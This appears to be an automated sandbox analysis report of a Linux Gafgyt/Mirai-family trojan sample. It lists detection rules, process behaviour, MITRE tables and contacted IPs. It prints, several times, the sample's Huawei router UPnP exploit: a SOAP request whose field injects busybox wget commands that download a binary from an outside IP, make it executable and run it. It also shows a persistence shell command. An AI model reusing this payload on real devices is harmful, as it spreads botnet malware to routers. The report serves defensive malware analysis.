73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 180.228.5.193
              Source: unknownTCP traffic detected without corresponding DNS query: 168.56.24.160
              Source: unknownTCP traffic detected without corresponding DNS query: 41.19.106.192
              Source: unknownTCP traffic detected without corresponding DNS query: 157.76.13.125
              Source: unknownTCP traffic detected without corresponding DNS query: 197.76.63.81
              Source: unknownTCP traffic detected without corresponding DNS query: 157.116.170.66
              Source: unknownTCP traffic detected without corresponding DNS query: 34.123.68.242
              Source: unknownTCP traffic detected without corresponding DNS query: 41.122.134.149
              Source: unknownTCP traffic detected without corresponding DNS query: 157.11.11.112
              Source: unknownTCP traffic detected without corresponding DNS query: 157.61.197.161
              Source: unknownTCP traffic detected without corresponding DNS query: 41.152.161.195
              Source: unknownTCP traffic detected without corresponding DNS query: 157.163.141.191
              Source: unknownTCP traffic detected without corresponding DNS query: 41.9.82.44
              Source: unknownTCP traffic detected without corresponding DNS query: 41.81.86.9
              Source: unknownTCP traffic detected without corresponding DNS query: 138.169.157.4
              Source: unknownTCP traffic detected without corresponding DNS query: 197.198.39.74
              Source: unknownTCP traffic detected without corresponding DNS query: 157.53.253.208
              Source: unknownTCP traffic detected without corresponding DNS query: 157.189.2.194
              Source: unknownTCP traffic detected without corresponding DNS query: 157.180.105.74
              Source: unknownTCP traffic detected without corresponding DNS query: 197.27.87.144
              Source: unknownTCP traffic detected without corresponding DNS query: 157.174.157.72
              Source: unknownTCP traffic detected without corresponding DNS query: 157.250.35.149
              Source: unknownTCP traffic detected without corresponding DNS query: 157.231.16.85
              Source: unknownTCP traffic detected without corresponding DNS query: 197.148.37.251
              Source: unknownTCP traffic detected without corresponding DNS query: 157.230.151.178
              Source: unknownTCP traffic detected without corresponding DNS query: 157.187.146.16
              Source: unknownTCP traffic detected without corresponding DNS query: 119.166.35.125
              Source: unknownTCP traffic detected without corresponding DNS query: 157.87.60.173
              Source: unknownTCP traffic detected without corresponding DNS query: 197.217.204.246
              Source: unknownTCP traffic detected without corresponding DNS query: 157.222.172.203
              Source: unknownTCP traffic detected without corresponding DNS query: 157.31.178.119
              Source: unknownTCP traffic detected without corresponding DNS query: 157.115.99.130
              Source: unknownTCP traffic detected without corresponding DNS query: 41.13.223.106
              Source: unknownTCP traffic detected without corresponding DNS query: 143.105.138.206
              Source: unknownTCP traffic detected without corresponding DNS query: 32.60.204.58
              Source: unknownTCP traffic detected without corresponding DNS query: 41.69.39.242
              Source: unknownTCP traffic detected without corresponding DNS query: 197.121.213.18
              Source: unknownTCP traffic detected without corresponding DNS query: 157.247.80.52
              Source: unknownTCP traffic detected without corresponding DNS query: 41.174.171.134
              Source: unknownTCP traffic detected without corresponding DNS query: 148.187.75.112
              Source: unknownTCP traffic detected without corresponding DNS query: 157.148.62.25
              Source: unknownTCP traffic detected without corresponding DNS query: 157.119.248.58
              Source: unknownTCP traffic detected without corresponding DNS query: 197.136.47.101
              Source: unknownTCP traffic detected without corresponding DNS query: 197.89.58.77
              Source: unknownTCP traffic detected without corresponding DNS query: 197.254.87.253
              Source: unknownTCP traffic detected without corresponding DNS query: 41.128.204.82
              Source: unknownTCP traffic detected without corresponding DNS query: 157.176.123.57
              Source: unknownTCP traffic detected without corresponding DNS query: 157.138.24.78
              Source: VeTv7e9Dcz.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: VeTv7e9Dcz.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownDNS traffic detected: queries for: BC@^]B

              System Summary

              barindex
              Source: VeTv7e9Dcz.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 6236.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 6226.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: VeTv7e9Dcz.elf PID: 6226, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: VeTv7e9Dcz.elf PID: 6236, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: VeTv7e9Dcz.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 6236.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 6226.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: VeTv7e9Dcz.elf PID: 6226, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: VeTv7e9Dcz.elf PID: 6236, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox
              Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemd
              Source: classification engineClassification label: mal92.troj.linELF@0/0@100/0

              Persistence and Installation Behavior

              barindex
              Source: /bin/sh (PID: 6233)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/systemd
              Source: /bin/sh (PID: 6231)Mkdir executable: /usr/bin/mkdir -> mkdir bin
              Source: /bin/sh (PID: 6233)Chmod executable: /usr/bin/chmod -> chmod 777 bin/systemd
              Source: /usr/bin/chmod (PID: 6233)File: /tmp/bin/systemd (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
              Source: /tmp/VeTv7e9Dcz.elf (PID: 6228)Shell command executed: sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/VeTv7e9Dcz.elf bin/systemd; chmod 777 bin/systemd"
              Source: /bin/sh (PID: 6230)Rm executable: /usr/bin/rm -> rm -rf bin/systemd

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44248 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44248
              Source: unknownNetwork traffic detected: HTTP traffic on port 60578 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 60578
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57788 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
              Source: /tmp/VeTv7e9Dcz.elf (PID: 6226)Queries kernel information via 'uname':
              Source: VeTv7e9Dcz.elf, 6226.1.00007ffedb455000.00007ffedb476000.rw-.sdmp, VeTv7e9Dcz.elf, 6236.1.00007ffedb455000.00007ffedb476000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/VeTv7e9Dcz.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/VeTv7e9Dcz.elf
              Source: VeTv7e9Dcz.elf, 6226.1.000055cac57ce000.000055cac587e000.rw-.sdmp, VeTv7e9Dcz.elf, 6236.1.000055cac57ce000.000055cac587e000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
              Source: VeTv7e9Dcz.elf, 6226.1.000055cac57ce000.000055cac587e000.rw-.sdmp, VeTv7e9Dcz.elf, 6236.1.000055cac57ce000.000055cac587e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
              Source: VeTv7e9Dcz.elf, 6226.1.00007ffedb455000.00007ffedb476000.rw-.sdmp, VeTv7e9Dcz.elf, 6236.1.00007ffedb455000.00007ffedb476000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: VeTv7e9Dcz.elf, type: SAMPLE
              Source: Yara matchFile source: 6236.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6226.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: VeTv7e9Dcz.elf, type: SAMPLE
              Source: Yara matchFile source: 6236.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6226.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VeTv7e9Dcz.elf PID: 6226, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VeTv7e9Dcz.elf PID: 6236, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: VeTv7e9Dcz.elf, type: SAMPLE
              Source: Yara matchFile source: 6236.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6226.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: VeTv7e9Dcz.elf, type: SAMPLE
              Source: Yara matchFile source: 6236.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6226.1.00007fa060001000.00007fa060011000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: VeTv7e9Dcz.elf PID: 6226, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VeTv7e9Dcz.elf PID: 6236, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Scripting
              Path InterceptionPath Interception2
              File and Directory Permissions Modification
              OS Credential Dumping11
              Security Software Discovery
              Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Scripting
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
              Non-Standard Port
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830765 Sample: VeTv7e9Dcz.elf Startdate: 20/03/2023 Architecture: LINUX Score: 92 27 41.202.150.4, 37215 ZIPNETGH unknown 2->27 29 138.220.234.242, 37215 WORLDBANKUS United States 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 8 VeTv7e9Dcz.elf 2->8         started        signatures3 process4 process5 10 VeTv7e9Dcz.elf sh 8->10         started        12 VeTv7e9Dcz.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 VeTv7e9Dcz.elf 12->23         started        25 VeTv7e9Dcz.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41
              SourceDetectionScannerLabelLink
              VeTv7e9Dcz.elf59%ReversingLabsLinux.Trojan.Mirai
              VeTv7e9Dcz.elf61%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/VeTv7e9Dcz.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/VeTv7e9Dcz.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  197.247.118.54
                  unknownMorocco
                  36925ASMediMAfalse
                  57.27.35.138
                  unknownBelgium
                  2686ATGS-MMD-ASUSfalse
                  197.234.167.185
                  unknownSouth Africa
                  37315CipherWaveZAfalse
                  111.150.82.125
                  unknownChina
                  38370CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  197.87.221.134
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  41.42.229.210
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.36.131.164
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  157.201.251.216
                  unknownUnited States
                  33281BRIGHAM-YOUNG-UNIVERSITY-IDAHOUSfalse
                  197.49.112.231
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  62.161.162.146
                  unknownFrance
                  3215FranceTelecom-OrangeFRfalse
                  41.203.250.186
                  unknownSeychelles
                  36902ASINTELVISIONSCfalse
                  223.192.185.45
                  unknownChina
                  7497CSTNET-AS-APComputerNetworkInformationCenterCNfalse
                  41.251.165.149
                  unknownMorocco
                  36903MT-MPLSMAfalse
                  81.156.178.88
                  unknownUnited Kingdom
                  2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                  41.3.250.50
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  157.97.64.139
                  unknownGermany
                  25259MDCLOUD-ESfalse
                  157.48.186.148
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  197.46.166.28
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.21.215.59
                  unknownSouth Africa
                  36994Vodacom-VBZAfalse
                  157.211.157.176
                  unknownAustralia
                  7573UTASTheUniversityofTasmaniaAUfalse
                  51.118.119.200
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  41.116.238.222
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  197.118.80.100
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  197.77.77.97
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  41.222.196.127
                  unknownCongo The Democratic Republic of The
                  37020CELTEL-DRCCDfalse
                  197.59.205.50
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.145.166.81
                  unknownSouth Africa
                  5713SAIX-NETZAfalse
                  157.124.146.107
                  unknownFinland
                  1738OKOBANK-ASEUfalse
                  197.33.73.10
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.59.48.77
                  unknownTanzania United Republic of
                  33765TTCLDATATZfalse
                  41.169.25.75
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  138.220.234.242
                  unknownUnited States
                  10497WORLDBANKUSfalse
                  197.17.202.164
                  unknownTunisia
                  37693TUNISIANATNfalse
                  197.206.175.78
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  157.25.46.232
                  unknownPoland
                  5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                  41.135.57.100
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  157.34.57.103
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  197.165.44.53
                  unknownEgypt
                  24863LINKdotNET-ASEGfalse
                  157.127.227.102
                  unknownUnited States
                  1906NORTHROP-GRUMMANUSfalse
                  41.156.40.150
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  197.8.107.192
                  unknownTunisia
                  5438ATI-TNfalse
                  197.132.129.168
                  unknownEgypt
                  24835RAYA-ASEGfalse
                  109.244.173.151
                  unknownChina
                  45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompafalse
                  157.9.162.55
                  unknownJapan4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  157.64.206.81
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  197.227.174.9
                  unknownMauritius
                  23889MauritiusTelecomMUfalse
                  41.96.36.205
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  41.233.119.53
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  66.113.21.21
                  unknownUnited States
                  15221STRATUSIQUSfalse
                  135.253.41.199
                  unknownUnited States
                  10455LUCENT-CIOUSfalse
                  41.49.24.129
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  157.20.207.5
                  unknownunknown
                  24297FCNUniversityPublicCorporationOsakaJPfalse
                  161.237.38.240
                  unknownUnited States
                  396269BPL-ASNUSfalse
                  197.60.70.229
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  197.113.54.117
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  157.23.1.231
                  unknownFrance
                  7091VIANET-ASNUSfalse
                  41.67.115.101
                  unknownunknown
                  36974AFNET-ASCIfalse
                  41.141.24.246
                  unknownMorocco
                  36903MT-MPLSMAfalse
                  197.114.109.14
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  197.176.125.149
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  49.23.179.75
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  157.194.40.10
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  41.177.165.217
                  unknownSouth Africa
                  36874CybersmartZAfalse
                  23.87.97.28
                  unknownUnited States
                  395954LEASEWEB-USA-LAX-11USfalse
                  41.105.143.107
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  157.247.33.248
                  unknownAustria
                  8447TELEKOM-ATA1TelekomAustriaAGATfalse
                  197.178.176.162
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  197.180.107.68
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  41.202.150.4
                  unknownunknown
                  36961ZIPNETGHfalse
                  157.40.148.205
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  169.92.64.135
                  unknownUnited States
                  37611AfrihostZAfalse
                  41.224.199.208
                  unknownTunisia
                  37492ORANGE-TNfalse
                  157.245.169.42
